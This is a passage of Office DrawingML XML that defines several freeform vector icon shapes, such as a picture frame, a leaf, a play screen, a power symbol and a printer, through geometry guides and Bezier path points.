                      <a:pt x="65" y="69"/>
                      <a:pt x="53" y="77"/>
                      <a:pt x="39" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="77"/>
                      <a:pt x="29" y="76"/>
                      <a:pt x="24" y="74"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="17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1" y="45"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="24"/>
                      <a:pt x="8" y="11"/>
                      <a:pt x="20" y="5"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="32" y="17"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="20" y="38"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="72"/>
                      <a:pt x="20" y="72"/>
                      <a:pt x="20" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="68"/>
                      <a:pt x="7" y="61"/>
                      <a:pt x="4" y="54"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2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4" name="Freeform 109">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D159886-DCB6-48D2-BF72-28BEE87AAD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62270" y="3049145"/>
                <a:ext cx="230965" cy="185946"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 58"/>
                  <a:gd name="T2" fmla="*/ 0 w 72"/>
                  <a:gd name="T3" fmla="*/ 58 h 58"/>
                  <a:gd name="T4" fmla="*/ 72 w 72"/>
                  <a:gd name="T5" fmla="*/ 58 h 58"/>
                  <a:gd name="T6" fmla="*/ 72 w 72"/>
                  <a:gd name="T7" fmla="*/ 0 h 58"/>
                  <a:gd name="T8" fmla="*/ 0 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 58"/>
                  <a:gd name="T10" fmla="*/ 67 w 72"/>
                  <a:gd name="T11" fmla="*/ 53 h 58"/>
                  <a:gd name="T12" fmla="*/ 4 w 72"/>
                  <a:gd name="T13" fmla="*/ 53 h 58"/>
                  <a:gd name="T14" fmla="*/ 4 w 72"/>
                  <a:gd name="T15" fmla="*/ 4 h 58"/>
                  <a:gd name="T16" fmla="*/ 67 w 72"/>
                  <a:gd name="T17" fmla="*/ 4 h 58"/>
                  <a:gd name="T18" fmla="*/ 67 w 72"/>
                  <a:gd name="T19" fmla="*/ 53 h 58"/>
                  <a:gd name="T20" fmla="*/ 49 w 72"/>
                  <a:gd name="T21" fmla="*/ 15 h 58"/>
                  <a:gd name="T22" fmla="*/ 56 w 72"/>
                  <a:gd name="T23" fmla="*/ 22 h 58"/>
                  <a:gd name="T24" fmla="*/ 63 w 72"/>
                  <a:gd name="T25" fmla="*/ 15 h 58"/>
                  <a:gd name="T26" fmla="*/ 56 w 72"/>
                  <a:gd name="T27" fmla="*/ 9 h 58"/>
                  <a:gd name="T28" fmla="*/ 49 w 72"/>
                  <a:gd name="T29" fmla="*/ 15 h 58"/>
                  <a:gd name="T30" fmla="*/ 63 w 72"/>
                  <a:gd name="T31" fmla="*/ 49 h 58"/>
                  <a:gd name="T32" fmla="*/ 9 w 72"/>
                  <a:gd name="T33" fmla="*/ 49 h 58"/>
                  <a:gd name="T34" fmla="*/ 22 w 72"/>
                  <a:gd name="T35" fmla="*/ 13 h 58"/>
                  <a:gd name="T36" fmla="*/ 40 w 72"/>
                  <a:gd name="T37" fmla="*/ 35 h 58"/>
                  <a:gd name="T38" fmla="*/ 49 w 72"/>
                  <a:gd name="T39" fmla="*/ 29 h 58"/>
                  <a:gd name="T40" fmla="*/ 63 w 72"/>
                  <a:gd name="T41" fmla="*/ 49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" h="58">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="58"/>
                      <a:pt x="0" y="58"/>
                      <a:pt x="0" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="58"/>
                      <a:pt x="72" y="58"/>
                      <a:pt x="72" y="58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0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="67" y="53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67" y="4"/>
                      <a:pt x="67" y="4"/>
                      <a:pt x="67" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="67" y="53"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="49" y="15"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="19"/>
                      <a:pt x="52" y="22"/>
                      <a:pt x="56" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="22"/>
                      <a:pt x="63" y="19"/>
                      <a:pt x="63" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="12"/>
                      <a:pt x="60" y="9"/>
                      <a:pt x="56" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="9"/>
                      <a:pt x="49" y="12"/>
                      <a:pt x="49" y="15"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="63" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="49"/>
                      <a:pt x="9" y="49"/>
                      <a:pt x="9" y="49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49" y="29"/>
                      <a:pt x="49" y="29"/>
                      <a:pt x="49" y="29"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="63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5" name="Freeform 110">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40ABE9A7-437D-40BD-8F67-20D6D1C82D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70276" y="3305554"/>
                <a:ext cx="242709" cy="281855"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 76"/>
                  <a:gd name="T1" fmla="*/ 0 h 88"/>
                  <a:gd name="T2" fmla="*/ 14 w 76"/>
                  <a:gd name="T3" fmla="*/ 28 h 88"/>
                  <a:gd name="T4" fmla="*/ 16 w 76"/>
                  <a:gd name="T5" fmla="*/ 65 h 88"/>
                  <a:gd name="T6" fmla="*/ 49 w 76"/>
                  <a:gd name="T7" fmla="*/ 27 h 88"/>
                  <a:gd name="T8" fmla="*/ 32 w 76"/>
                  <a:gd name="T9" fmla="*/ 75 h 88"/>
                  <a:gd name="T10" fmla="*/ 70 w 76"/>
                  <a:gd name="T11" fmla="*/ 57 h 88"/>
                  <a:gd name="T12" fmla="*/ 54 w 76"/>
                  <a:gd name="T13" fmla="*/ 0 h 88"/>
                  <a:gd name="T14" fmla="*/ 4 w 76"/>
                  <a:gd name="T15" fmla="*/ 78 h 88"/>
                  <a:gd name="T16" fmla="*/ 10 w 76"/>
                  <a:gd name="T17" fmla="*/ 83 h 88"/>
                  <a:gd name="T18" fmla="*/ 47 w 76"/>
                  <a:gd name="T19" fmla="*/ 41 h 88"/>
                  <a:gd name="T20" fmla="*/ 4 w 76"/>
                  <a:gd name="T21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8">
                    <a:moveTo>
                      <a:pt x="54" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="23"/>
                      <a:pt x="30" y="12"/>
                      <a:pt x="14" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="42"/>
                      <a:pt x="5" y="60"/>
                      <a:pt x="16" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="60"/>
                      <a:pt x="40" y="46"/>
                      <a:pt x="49" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="27"/>
                      <a:pt x="57" y="51"/>
                      <a:pt x="32" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="88"/>
                      <a:pt x="64" y="79"/>
                      <a:pt x="70" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="33"/>
                      <a:pt x="60" y="9"/>
                      <a:pt x="54" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="4" y="78"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="79"/>
                      <a:pt x="4" y="83"/>
                      <a:pt x="10" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="83"/>
                      <a:pt x="36" y="71"/>
                      <a:pt x="47" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="71"/>
                      <a:pt x="6" y="78"/>
                      <a:pt x="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6" name="Freeform 111">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{149B2E1A-8A08-4D5C-9A4F-29B595BE5D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03727" y="2346463"/>
                <a:ext cx="328831" cy="244665"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 99 w 103"/>
                  <a:gd name="T1" fmla="*/ 3 h 77"/>
                  <a:gd name="T2" fmla="*/ 52 w 103"/>
                  <a:gd name="T3" fmla="*/ 0 h 77"/>
                  <a:gd name="T4" fmla="*/ 4 w 103"/>
                  <a:gd name="T5" fmla="*/ 3 h 77"/>
                  <a:gd name="T6" fmla="*/ 0 w 103"/>
                  <a:gd name="T7" fmla="*/ 38 h 77"/>
                  <a:gd name="T8" fmla="*/ 4 w 103"/>
                  <a:gd name="T9" fmla="*/ 73 h 77"/>
                  <a:gd name="T10" fmla="*/ 52 w 103"/>
                  <a:gd name="T11" fmla="*/ 77 h 77"/>
                  <a:gd name="T12" fmla="*/ 99 w 103"/>
                  <a:gd name="T13" fmla="*/ 73 h 77"/>
                  <a:gd name="T14" fmla="*/ 103 w 103"/>
                  <a:gd name="T15" fmla="*/ 38 h 77"/>
                  <a:gd name="T16" fmla="*/ 99 w 103"/>
                  <a:gd name="T17" fmla="*/ 3 h 77"/>
                  <a:gd name="T18" fmla="*/ 39 w 103"/>
                  <a:gd name="T19" fmla="*/ 57 h 77"/>
                  <a:gd name="T20" fmla="*/ 39 w 103"/>
                  <a:gd name="T21" fmla="*/ 19 h 77"/>
                  <a:gd name="T22" fmla="*/ 71 w 103"/>
                  <a:gd name="T23" fmla="*/ 38 h 77"/>
                  <a:gd name="T24" fmla="*/ 39 w 103"/>
                  <a:gd name="T25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77">
                    <a:moveTo>
                      <a:pt x="99" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="1"/>
                      <a:pt x="68" y="0"/>
                      <a:pt x="52" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="0"/>
                      <a:pt x="19" y="1"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="14"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="51"/>
                      <a:pt x="2" y="63"/>
                      <a:pt x="4" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="75"/>
                      <a:pt x="35" y="77"/>
                      <a:pt x="52" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="77"/>
                      <a:pt x="84" y="75"/>
                      <a:pt x="99" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="63"/>
                      <a:pt x="103" y="51"/>
                      <a:pt x="103" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="26"/>
                      <a:pt x="101" y="14"/>
                      <a:pt x="99" y="3"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="39" y="57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71" y="38"/>
                      <a:pt x="71" y="38"/>
                      <a:pt x="71" y="38"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="39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7" name="Freeform 112">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC36184-2355-4E8E-82B6-4FECE51A77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78281" y="3927985"/>
                <a:ext cx="367978" cy="367978"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 115 w 115"/>
                  <a:gd name="T1" fmla="*/ 32 h 115"/>
                  <a:gd name="T2" fmla="*/ 104 w 115"/>
                  <a:gd name="T3" fmla="*/ 22 h 115"/>
                  <a:gd name="T4" fmla="*/ 84 w 115"/>
                  <a:gd name="T5" fmla="*/ 42 h 115"/>
                  <a:gd name="T6" fmla="*/ 73 w 115"/>
                  <a:gd name="T7" fmla="*/ 30 h 115"/>
                  <a:gd name="T8" fmla="*/ 93 w 115"/>
                  <a:gd name="T9" fmla="*/ 10 h 115"/>
                  <a:gd name="T10" fmla="*/ 83 w 115"/>
                  <a:gd name="T11" fmla="*/ 0 h 115"/>
                  <a:gd name="T12" fmla="*/ 63 w 115"/>
                  <a:gd name="T13" fmla="*/ 20 h 115"/>
                  <a:gd name="T14" fmla="*/ 50 w 115"/>
                  <a:gd name="T15" fmla="*/ 7 h 115"/>
                  <a:gd name="T16" fmla="*/ 40 w 115"/>
                  <a:gd name="T17" fmla="*/ 17 h 115"/>
                  <a:gd name="T18" fmla="*/ 98 w 115"/>
                  <a:gd name="T19" fmla="*/ 74 h 115"/>
                  <a:gd name="T20" fmla="*/ 107 w 115"/>
                  <a:gd name="T21" fmla="*/ 65 h 115"/>
                  <a:gd name="T22" fmla="*/ 95 w 115"/>
                  <a:gd name="T23" fmla="*/ 52 h 115"/>
                  <a:gd name="T24" fmla="*/ 115 w 115"/>
                  <a:gd name="T25" fmla="*/ 32 h 115"/>
                  <a:gd name="T26" fmla="*/ 31 w 115"/>
                  <a:gd name="T27" fmla="*/ 84 h 115"/>
                  <a:gd name="T28" fmla="*/ 89 w 115"/>
                  <a:gd name="T29" fmla="*/ 76 h 115"/>
                  <a:gd name="T30" fmla="*/ 39 w 115"/>
                  <a:gd name="T31" fmla="*/ 26 h 115"/>
                  <a:gd name="T32" fmla="*/ 31 w 115"/>
                  <a:gd name="T33" fmla="*/ 84 h 115"/>
                  <a:gd name="T34" fmla="*/ 21 w 115"/>
                  <a:gd name="T35" fmla="*/ 79 h 115"/>
                  <a:gd name="T36" fmla="*/ 36 w 115"/>
                  <a:gd name="T37" fmla="*/ 93 h 115"/>
                  <a:gd name="T38" fmla="*/ 14 w 115"/>
                  <a:gd name="T39" fmla="*/ 115 h 115"/>
                  <a:gd name="T40" fmla="*/ 0 w 115"/>
                  <a:gd name="T41" fmla="*/ 100 h 115"/>
                  <a:gd name="T42" fmla="*/ 21 w 115"/>
                  <a:gd name="T43" fmla="*/ 7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5" h="115">
                    <a:moveTo>
                      <a:pt x="115" y="32"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="22"/>
                      <a:pt x="104" y="22"/>
                      <a:pt x="104" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="42"/>
                      <a:pt x="84" y="42"/>
                      <a:pt x="84" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="30"/>
                      <a:pt x="73" y="30"/>
                      <a:pt x="73" y="30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98" y="74"/>
                      <a:pt x="98" y="74"/>
                      <a:pt x="98" y="74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95" y="52"/>
                      <a:pt x="95" y="52"/>
                      <a:pt x="95" y="52"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="115" y="32"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="31" y="84"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="103"/>
                      <a:pt x="74" y="88"/>
                      <a:pt x="89" y="7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27" y="41"/>
                      <a:pt x="12" y="66"/>
                      <a:pt x="31" y="84"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="21" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="93"/>
                      <a:pt x="36" y="93"/>
                      <a:pt x="36" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="115"/>
                      <a:pt x="14" y="115"/>
                      <a:pt x="14" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="100"/>
                      <a:pt x="0" y="100"/>
                      <a:pt x="0" y="100"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21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8" name="Freeform 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE84D478-9D8E-4AC8-801D-BE9432B42C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17604" y="4376214"/>
                <a:ext cx="270111" cy="313173"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 85"/>
                  <a:gd name="T1" fmla="*/ 14 h 98"/>
                  <a:gd name="T2" fmla="*/ 55 w 85"/>
                  <a:gd name="T3" fmla="*/ 27 h 98"/>
                  <a:gd name="T4" fmla="*/ 64 w 85"/>
                  <a:gd name="T5" fmla="*/ 33 h 98"/>
                  <a:gd name="T6" fmla="*/ 73 w 85"/>
                  <a:gd name="T7" fmla="*/ 55 h 98"/>
                  <a:gd name="T8" fmla="*/ 64 w 85"/>
                  <a:gd name="T9" fmla="*/ 77 h 98"/>
                  <a:gd name="T10" fmla="*/ 43 w 85"/>
                  <a:gd name="T11" fmla="*/ 86 h 98"/>
                  <a:gd name="T12" fmla="*/ 21 w 85"/>
                  <a:gd name="T13" fmla="*/ 77 h 98"/>
                  <a:gd name="T14" fmla="*/ 12 w 85"/>
                  <a:gd name="T15" fmla="*/ 55 h 98"/>
                  <a:gd name="T16" fmla="*/ 21 w 85"/>
                  <a:gd name="T17" fmla="*/ 33 h 98"/>
                  <a:gd name="T18" fmla="*/ 30 w 85"/>
                  <a:gd name="T19" fmla="*/ 27 h 98"/>
                  <a:gd name="T20" fmla="*/ 30 w 85"/>
                  <a:gd name="T21" fmla="*/ 14 h 98"/>
                  <a:gd name="T22" fmla="*/ 0 w 85"/>
                  <a:gd name="T23" fmla="*/ 55 h 98"/>
                  <a:gd name="T24" fmla="*/ 43 w 85"/>
                  <a:gd name="T25" fmla="*/ 98 h 98"/>
                  <a:gd name="T26" fmla="*/ 85 w 85"/>
                  <a:gd name="T27" fmla="*/ 55 h 98"/>
                  <a:gd name="T28" fmla="*/ 55 w 85"/>
                  <a:gd name="T29" fmla="*/ 14 h 98"/>
                  <a:gd name="T30" fmla="*/ 37 w 85"/>
                  <a:gd name="T31" fmla="*/ 0 h 98"/>
                  <a:gd name="T32" fmla="*/ 49 w 85"/>
                  <a:gd name="T33" fmla="*/ 0 h 98"/>
                  <a:gd name="T34" fmla="*/ 49 w 85"/>
                  <a:gd name="T35" fmla="*/ 49 h 98"/>
                  <a:gd name="T36" fmla="*/ 37 w 85"/>
                  <a:gd name="T37" fmla="*/ 49 h 98"/>
                  <a:gd name="T38" fmla="*/ 37 w 85"/>
                  <a:gd name="T3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5" h="98">
                    <a:moveTo>
                      <a:pt x="55" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="27"/>
                      <a:pt x="55" y="27"/>
                      <a:pt x="55" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="29"/>
                      <a:pt x="62" y="31"/>
                      <a:pt x="64" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="39"/>
                      <a:pt x="73" y="47"/>
                      <a:pt x="73" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="63"/>
                      <a:pt x="70" y="71"/>
                      <a:pt x="64" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="82"/>
                      <a:pt x="51" y="86"/>
                      <a:pt x="43" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="86"/>
                      <a:pt x="27" y="82"/>
                      <a:pt x="21" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="71"/>
                      <a:pt x="12" y="63"/>
                      <a:pt x="12" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="47"/>
                      <a:pt x="15" y="39"/>
                      <a:pt x="21" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="31"/>
                      <a:pt x="27" y="29"/>
                      <a:pt x="30" y="27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13" y="19"/>
                      <a:pt x="0" y="36"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="79"/>
                      <a:pt x="19" y="98"/>
                      <a:pt x="43" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="98"/>
                      <a:pt x="85" y="79"/>
                      <a:pt x="85" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="36"/>
                      <a:pt x="73" y="19"/>
                      <a:pt x="55" y="14"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37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37" y="49"/>
                      <a:pt x="37" y="49"/>
                      <a:pt x="37" y="49"/>
                    </a:cubicBez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79" name="Freeform 114">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856AB504-AA8A-42DB-8C92-6F3E53DC5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8921" y="3640258"/>
                <a:ext cx="146800" cy="256409"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 75"/>
                  <a:gd name="T1" fmla="*/ 131 h 131"/>
                  <a:gd name="T2" fmla="*/ 0 w 75"/>
                  <a:gd name="T3" fmla="*/ 0 h 131"/>
                  <a:gd name="T4" fmla="*/ 21 w 75"/>
                  <a:gd name="T5" fmla="*/ 0 h 131"/>
                  <a:gd name="T6" fmla="*/ 21 w 75"/>
                  <a:gd name="T7" fmla="*/ 59 h 131"/>
                  <a:gd name="T8" fmla="*/ 75 w 75"/>
                  <a:gd name="T9" fmla="*/ 5 h 131"/>
                  <a:gd name="T10" fmla="*/ 75 w 75"/>
                  <a:gd name="T11" fmla="*/ 125 h 131"/>
                  <a:gd name="T12" fmla="*/ 21 w 75"/>
                  <a:gd name="T13" fmla="*/ 71 h 131"/>
                  <a:gd name="T14" fmla="*/ 21 w 75"/>
                  <a:gd name="T15" fmla="*/ 131 h 131"/>
                  <a:gd name="T16" fmla="*/ 0 w 75"/>
                  <a:gd name="T17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131">
                    <a:moveTo>
                      <a:pt x="0" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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0" name="Freeform 115">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E79DB4B2-BD7A-4DF2-8BD2-31DB3F835E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6926" y="2651806"/>
                <a:ext cx="279899" cy="250538"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 88"/>
                  <a:gd name="T1" fmla="*/ 0 h 78"/>
                  <a:gd name="T2" fmla="*/ 66 w 88"/>
                  <a:gd name="T3" fmla="*/ 0 h 78"/>
                  <a:gd name="T4" fmla="*/ 66 w 88"/>
                  <a:gd name="T5" fmla="*/ 11 h 78"/>
                  <a:gd name="T6" fmla="*/ 22 w 88"/>
                  <a:gd name="T7" fmla="*/ 11 h 78"/>
                  <a:gd name="T8" fmla="*/ 22 w 88"/>
                  <a:gd name="T9" fmla="*/ 0 h 78"/>
                  <a:gd name="T10" fmla="*/ 83 w 88"/>
                  <a:gd name="T11" fmla="*/ 17 h 78"/>
                  <a:gd name="T12" fmla="*/ 5 w 88"/>
                  <a:gd name="T13" fmla="*/ 17 h 78"/>
                  <a:gd name="T14" fmla="*/ 0 w 88"/>
                  <a:gd name="T15" fmla="*/ 22 h 78"/>
                  <a:gd name="T16" fmla="*/ 0 w 88"/>
                  <a:gd name="T17" fmla="*/ 50 h 78"/>
                  <a:gd name="T18" fmla="*/ 5 w 88"/>
                  <a:gd name="T19" fmla="*/ 56 h 78"/>
                  <a:gd name="T20" fmla="*/ 22 w 88"/>
                  <a:gd name="T21" fmla="*/ 56 h 78"/>
                  <a:gd name="T22" fmla="*/ 22 w 88"/>
                  <a:gd name="T23" fmla="*/ 78 h 78"/>
                  <a:gd name="T24" fmla="*/ 66 w 88"/>
                  <a:gd name="T25" fmla="*/ 78 h 78"/>
                  <a:gd name="T26" fmla="*/ 66 w 88"/>
                  <a:gd name="T27" fmla="*/ 56 h 78"/>
                  <a:gd name="T28" fmla="*/ 83 w 88"/>
                  <a:gd name="T29" fmla="*/ 56 h 78"/>
                  <a:gd name="T30" fmla="*/ 88 w 88"/>
                  <a:gd name="T31" fmla="*/ 50 h 78"/>
                  <a:gd name="T32" fmla="*/ 88 w 88"/>
                  <a:gd name="T33" fmla="*/ 22 h 78"/>
                  <a:gd name="T34" fmla="*/ 83 w 88"/>
                  <a:gd name="T35" fmla="*/ 17 h 78"/>
                  <a:gd name="T36" fmla="*/ 60 w 88"/>
                  <a:gd name="T37" fmla="*/ 72 h 78"/>
                  <a:gd name="T38" fmla="*/ 27 w 88"/>
                  <a:gd name="T39" fmla="*/ 72 h 78"/>
                  <a:gd name="T40" fmla="*/ 27 w 88"/>
                  <a:gd name="T41" fmla="*/ 45 h 78"/>
                  <a:gd name="T42" fmla="*/ 60 w 88"/>
                  <a:gd name="T43" fmla="*/ 45 h 78"/>
                  <a:gd name="T44" fmla="*/ 60 w 88"/>
                  <a:gd name="T45" fmla="*/ 72 h 78"/>
                  <a:gd name="T46" fmla="*/ 84 w 88"/>
                  <a:gd name="T47" fmla="*/ 25 h 78"/>
                  <a:gd name="T48" fmla="*/ 80 w 88"/>
                  <a:gd name="T49" fmla="*/ 29 h 78"/>
                  <a:gd name="T50" fmla="*/ 76 w 88"/>
                  <a:gd name="T51" fmla="*/ 25 h 78"/>
                  <a:gd name="T52" fmla="*/ 80 w 88"/>
                  <a:gd name="T53" fmla="*/ 21 h 78"/>
                  <a:gd name="T54" fmla="*/ 84 w 88"/>
                  <a:gd name="T55" fmla="*/ 2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8" h="78">
                    <a:moveTo>
                      <a:pt x="22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6" y="11"/>
                      <a:pt x="66" y="11"/>
                      <a:pt x="66" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="11"/>
                      <a:pt x="22" y="11"/>
                      <a:pt x="22" y="11"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="83" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="17"/>
                      <a:pt x="5" y="17"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="17"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="22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3"/>
                      <a:pt x="2" y="56"/>
                      <a:pt x="5" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="56"/>
                      <a:pt x="22" y="56"/>
                      <a:pt x="22" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="78"/>
                      <a:pt x="22" y="78"/>
                      <a:pt x="22" y="78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6" y="56"/>
                      <a:pt x="66" y="56"/>
                      <a:pt x="66" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="56"/>
                      <a:pt x="83" y="56"/>
                      <a:pt x="83" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="56"/>
                      <a:pt x="88" y="53"/>
                      <a:pt x="88" y="50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19"/>
                      <a:pt x="86" y="17"/>
